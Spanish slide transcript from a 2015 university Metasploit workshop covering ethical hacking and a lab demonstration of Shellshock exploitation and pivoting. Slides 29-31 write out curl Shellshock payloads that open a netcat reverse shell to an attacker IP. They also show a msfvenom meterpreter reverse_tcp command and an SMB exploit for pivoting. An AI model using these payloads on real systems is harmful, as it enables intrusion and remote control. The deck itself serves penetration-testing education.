Mi presentación del Taller Metasploit impartido en la Universidad de Sevilla en las II Jornadas de Seguridad en las Comunicaciones y la Información. Demostración practica de ataque a un servidor con Shellshock y pivoting hacia la red Interna. 9/Junio/2015
Francisco Irarrazaval, Marcos Pueyrredon - eCommerce Day Chile 2024
Metasploit Class: Shellshock Attack
1. II JORNADA DE SEGURIDAD EN LAS
COMUNICACIONES Y LA INFORMACIÓN
1
09/Junio 2015
Julián José González Caracuel
Consultor Senior de Seguridad de la Información
CISA /GCIH /GPEN /ITIL Certified
Organiza:
2. ¿Quién soy?
2
Julian J. González Caracuel
Ingeniero de Telecomunicaciones – Esp. Telemática
Consultor Senior Seguridad de la Información
CISA /GCIH /GPEN /ITIL Certified
En sus mas de 10 años de experiencia, ha sido miembro del NVAT (Equipo
Nacional de Análisis de Vulnerabilidades) en el Estado Mayor de la Defensa
(EMAD), asesor del equipo directivo de Centro de Excelencia CIED de la OTAN en
Hoyo de Manzanares, e investigador en el ámbito de los procedimientos y
metodologías en entorno a la protección de las Infraestructuras Críticas.
Profesor del Modulo de Hacking & Pentesting – Máster de Seguridad TIC –
Universidad de Sevilla.
Actualmente ejerciendo de Freelance bajo la marca ST2Labs.
3. La clase de hoy
3
INTRODUCCIÓN LESSON LEARNEDDEMOSTRACIÓN
5. ¿Qué es Hacking?
5
• Es la actividad donde se pone en práctica tu habilidad para evadir
los sistema de protección y acceder a un Sistema.
• En éste área se realizan los test de penetración, comprobación del
nivel de seguridad de la Organización desde el punto de vista del
atacante, buscando vulnerabilidades y la forma de explotarlas.
Hacking, es la parte más creativa del artista
By Julian J. González
6. ¿Qué es Hacker Ético?
6
Por supuesto, para convertirse en un
Hacker Ético o profesional de la Seguridad
de la Información, se deben de obtener
los conocimientos suficientes como para
ser capaz de comprender la técnicas,
manejar las herramientas e interpretar los
resultados de éstas.
Real Academia Española (RAE) decidió incluir la palabra “hacker” en
el diccionario con una al menos curiosa definición: “pirata
informático
7. ¿Qué es Hacker Ético?2
7
• Tipos de Hackers:
Black: utilizan sus
conocimientos para llevar a
cabo “actividades ilegales”
Grey: son “ambiguos”,
utilizan sus conocimientos
tanto para llevar a cabo
“actividades ilegales” como
legales.
White: utilizan sus
conocimientos para detectar
las debilidades y aplicar la
contramedidas necesarias.
Son los “Profesionales de la
Seguridad”
9. Vulnerabilidad vs Exploit
9
Exploit es una pieza de
software, fragmento de datos o
secuencia de comandos y/o
acciones, diseñada para
aprovechar la vulnerabilidad y
conseguir ejecución de código
arbitrario.
Vulnerabilidad es el
“comportamiento” no
esperado en un elemento
software, que suelen ser
errores de programación y/o
diseño de la aplicación o
software.
11. METASPLOIT FRAMEWORK
11
• La herramienta más utilizada por los #Pentester y
#Ethical Hacking!!
• Es una herramienta para el desarrollo y evaluación de
vulnerabilidades. ¡¡ Miles de Exploits listos para atacar !!
Web: http://www.metasploit.com/
Download:
http://www.metasploit.com/download/
Versión:
Community (Free)| Express |Professional
Framework (source code)
Multiplataforma: Linux / Windows / Mac
http://www.tenable.com/products/nessus/nessus-download-
agreement
Incluida en BackTrack Linux | www.kali.org Free Pentesting Linux Distribution
12. MSF | Arsenal
12
Exploits Payload Aux 1
Interfaz de
usuario
Modulos Auxiliares:
Port Scanning
Import vulnerbaility scanning
Servers (socks, telnet, ftp…)
Launcher Exploit Payload
13. MSF | Ejemplo
13
Ejemplo:
Utilización de msfpayload para generar un ejecutable que
habilitará en el equipo donde se ejecute una shell (línea
de comandos) remota (conexión con la dirección IP
introducida en el campo LHOST)
Cambiar LHOST por RHOST
14. MSF | Meterpreter
14
• Metasploit Interpreter: es un payload (stages) especialmente
diseñado por metasploit para ejecutarse dentro de la memoria de
un proceso residente.
• Se le conoce como Meterpreter, siendo el payload más potente y
flexible del que dispone metasploit.
• Permite la carga de módulos y scripts adicionales, por lo que
aumenta considerablemente la capacidad de este payload.
• Actualmente dispone de una versión de meterpreter tanto para
Windows como para Linux.
>> Hacking Mobile >Ahora Meterpreter también en Android!!!!
29. 29
192.168.0.3
WINXP SP3
HTTP SERVER 172.16.0.5
LINUX
ATTACKER
10.0.0.50
KALI LINUX
1. SCAN SERVICIOS
2. SCAN SHELLSHOCK
3. COMPROBAR REGLAS FIREWALL
nc –lv –p 22 < Lado Server >
Check Reglas del Firewall
curl -k -H 'User-Agent: () { :;}; /bin/bash -c “echo Bingo!>/dev/tcp/10.0.0.50/22"' http://172.16.0.5/cgi-bin/st2.cgi
Shell Inversa
curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc -e /bin/bash 10.0.0.50 22"' http://172.16.0.5/cgi-bin/st2.cgi
ATTACK
30. 30
192.168.0.3
WINXP SP3
HTTP SERVER 172.16.0.5
LINUX
ATTACKER
10.0.0.50
KALI LINUX
EXPLOIT multi/handler < PAYLAOD= python/meterpreter/reverse_tcp
msf>
msfvenom –p python/meterpreter/reverse_tcp LHOST=10.0.0.50 LPORT=22
31. Pivoting !
31
192.168.0.3
WINXP SP3
HTTP SERVER 172.16.0.5
LINUX
ATTACKER
10.0.0.50
KALI LINUX
msf> route add 192.168.0.0 255.255.255.0 <sesión-id>
msf> use exploit Windows/smb/ms08_netapi / paylaod= windows/meterpreter/bind_tcp
32. Materia para profundizar
32
66,00 ECTS
Teléfono
954487384
Web
http://trajano.us.es/seguridadtic
Email
expertoseguridadtic@trajano.us.es
MASTER PROPIO –
SEGURIDAD EN LA INFORMACIÓN Y LAS
COMUNICACIONES (III EDICIÓN) – 2015/2016